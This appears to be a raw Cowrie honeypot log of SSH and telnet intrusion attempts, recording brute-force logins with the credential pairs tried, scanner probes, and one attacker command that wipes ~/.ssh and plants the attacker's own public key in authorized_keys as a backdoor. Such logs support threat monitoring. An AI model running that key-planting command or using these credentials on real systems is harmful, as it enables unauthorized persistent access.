{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T17:59:48.490685Z","session":"3ae2a0a1a635"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57512,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0bff64da665","protocol":"ssh","message":"New connection: 212.227.235.229:57512 (1.2.3.4:22) [session: f0bff64da665]","sensor":"my-vps","timestamp":"2025-08-26T18:00:17.954967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:00:17.956728Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.044476Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123123123","message":"login attempt [root/qwe123123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.415770Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60269,"dst_ip":"1.2.3.4","dst_port":23,"session":"87273a3c66ad","protocol":"telnet","message":"New connection: 212.227.235.229:60269 (1.2.3.4:23) [session: 87273a3c66ad]","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.417398Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:00:18.682623Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.683366Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.684613Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.766291Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:00:18.946910Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:00:18.947601Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.030145Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.031152Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57812,"dst_ip":"1.2.3.4","dst_port":22,"session":"4174c5876965","protocol":"ssh","message":"New connection: 212.227.235.229:57812 (1.2.3.4:22) [session: 4174c5876965]","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.110824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.111487Z","src_ip":"212.227.235.229","session":"4174c5876965"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.192026Z","src_ip":"212.227.235.229","session":"4174c5876965"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:00:19.593802Z","src_ip":"212.227.235.229","session":"4174c5876965"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:20.692194Z","src_ip":"212.227.235.229","session":"4174c5876965"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58188,"dst_ip":"1.2.3.4","dst_port":22,"session":"546592cc6f64","protocol":"ssh","message":"New connection: 212.227.235.229:58188 (1.2.3.4:22) [session: 546592cc6f64]","sensor":"my-vps","timestamp":"2025-08-26T18:00:20.768892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:00:20.769684Z","src_ip":"212.227.235.229","session":"546592cc6f64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:00:20.848501Z","src_ip":"212.227.235.229","session":"546592cc6f64"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:00:21.204733Z","src_ip":"212.227.235.229","session":"546592cc6f64"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:21.284719Z","src_ip":"212.227.235.229","session":"546592cc6f64"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:21.285717Z","src_ip":"212.227.235.229","session":"f0bff64da665"}
{"eventid":"cowrie.session.connect","src_ip":"85.130.213.244","src_port":50465,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa0c746f17c5","protocol":"telnet","message":"New connection: 85.130.213.244:50465 (1.2.3.4:23) [session: fa0c746f17c5]","sensor":"my-vps","timestamp":"2025-08-26T18:00:23.832104Z"}
{"eventid":"cowrie.session.closed","duration":12.538643836975098,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:30.956009Z","src_ip":"212.227.235.229","session":"87273a3c66ad"}
{"eventid":"cowrie.session.connect","src_ip":"165.232.191.217","src_port":36358,"dst_ip":"1.2.3.4","dst_port":23,"session":"703b7c1f2a60","protocol":"telnet","message":"New connection: 165.232.191.217:36358 (1.2.3.4:23) [session: 703b7c1f2a60]","sensor":"my-vps","timestamp":"2025-08-26T18:00:31.838867Z"}
{"eventid":"cowrie.session.closed","duration":1.4857513904571533,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:33.324513Z","src_ip":"165.232.191.217","session":"703b7c1f2a60"}
{"eventid":"cowrie.session.connect","src_ip":"165.232.191.217","src_port":51984,"dst_ip":"1.2.3.4","dst_port":23,"session":"41dc5f9dad02","protocol":"telnet","message":"New connection: 165.232.191.217:51984 (1.2.3.4:23) [session: 41dc5f9dad02]","sensor":"my-vps","timestamp":"2025-08-26T18:00:34.978227Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:00:35.599679Z","src_ip":"165.232.191.217","session":"41dc5f9dad02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:00:35.663931Z","src_ip":"165.232.191.217","session":"41dc5f9dad02"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T18:00:35.975998Z","src_ip":"165.232.191.217","session":"41dc5f9dad02"}
{"eventid":"cowrie.session.closed","duration":13.004545211791992,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:36.836580Z","src_ip":"85.130.213.244","session":"fa0c746f17c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"3.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:38.795159Z","src_ip":"165.232.191.217","session":"41dc5f9dad02"}
{"eventid":"cowrie.session.closed","duration":3.824437141418457,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:38.802734Z","src_ip":"165.232.191.217","session":"41dc5f9dad02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50426,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2506a9d5f79","protocol":"ssh","message":"New connection: 212.227.235.229:50426 (1.2.3.4:22) [session: c2506a9d5f79]","sensor":"my-vps","timestamp":"2025-08-26T18:00:44.416274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:00:45.215241Z","src_ip":"212.227.235.229","session":"c2506a9d5f79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:00:45.216108Z","src_ip":"212.227.235.229","session":"c2506a9d5f79"}
{"eventid":"cowrie.login.success","username":"root","password":"Nidhish@123","message":"login attempt [root/Nidhish@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:00:48.735339Z","src_ip":"212.227.235.229","session":"c2506a9d5f79"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:49.434381Z","src_ip":"212.227.235.229","session":"c2506a9d5f79"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:00:57.844336Z","src_ip":"212.227.235.229","session":"3ae2a0a1a635"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51722,"dst_ip":"1.2.3.4","dst_port":23,"session":"14d356ae3b5d","protocol":"telnet","message":"New connection: 212.227.235.229:51722 (1.2.3.4:23) [session: 14d356ae3b5d]","sensor":"my-vps","timestamp":"2025-08-26T18:01:46.176293Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T18:01:46.543121Z","src_ip":"212.227.235.229","session":"14d356ae3b5d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T18:01:47.978066Z","src_ip":"212.227.235.229","session":"14d356ae3b5d"}
{"eventid":"cowrie.session.closed","duration":3.8331024646759033,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:01:50.009327Z","src_ip":"212.227.235.229","session":"14d356ae3b5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39028,"dst_ip":"1.2.3.4","dst_port":23,"session":"93b0a441a094","protocol":"telnet","message":"New connection: 212.227.235.229:39028 (1.2.3.4:23) [session: 93b0a441a094]","sensor":"my-vps","timestamp":"2025-08-26T18:01:50.150742Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:01:50.624152Z","src_ip":"212.227.235.229","session":"93b0a441a094"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:01:50.644415Z","src_ip":"212.227.235.229","session":"93b0a441a094"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T18:01:50.834384Z","src_ip":"212.227.235.229","session":"93b0a441a094"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:01:52.939841Z","src_ip":"212.227.235.229","session":"93b0a441a094"}
{"eventid":"cowrie.session.closed","duration":2.7946910858154297,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:01:52.945330Z","src_ip":"212.227.235.229","session":"93b0a441a094"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":51715,"dst_ip":"1.2.3.4","dst_port":22,"session":"957280326154","protocol":"ssh","message":"New connection: 213.108.243.7:51715 (1.2.3.4:22) [session: 957280326154]","sensor":"my-vps","timestamp":"2025-08-26T18:02:48.547616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:02:49.021517Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:02:49.022438Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword64","message":"login attempt [root/P@ssword64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:02:50.821788Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:02:51.323153Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T18:02:51.323832Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:02:51.557176Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:02:51.620754Z","src_ip":"213.108.243.7","session":"957280326154"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43254,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0b29df94be9","protocol":"ssh","message":"New connection: 212.227.235.229:43254 (1.2.3.4:22) [session: e0b29df94be9]","sensor":"my-vps","timestamp":"2025-08-26T18:03:10.918034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:03:10.919292Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:03:11.079149Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36232,"dst_ip":"1.2.3.4","dst_port":22,"session":"c426e6dfcca2","protocol":"ssh","message":"New connection: 212.227.235.229:36232 (1.2.3.4:22) [session: c426e6dfcca2]","sensor":"my-vps","timestamp":"2025-08-26T18:03:11.182030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:03:11.183182Z","src_ip":"212.227.235.229","session":"c426e6dfcca2"}
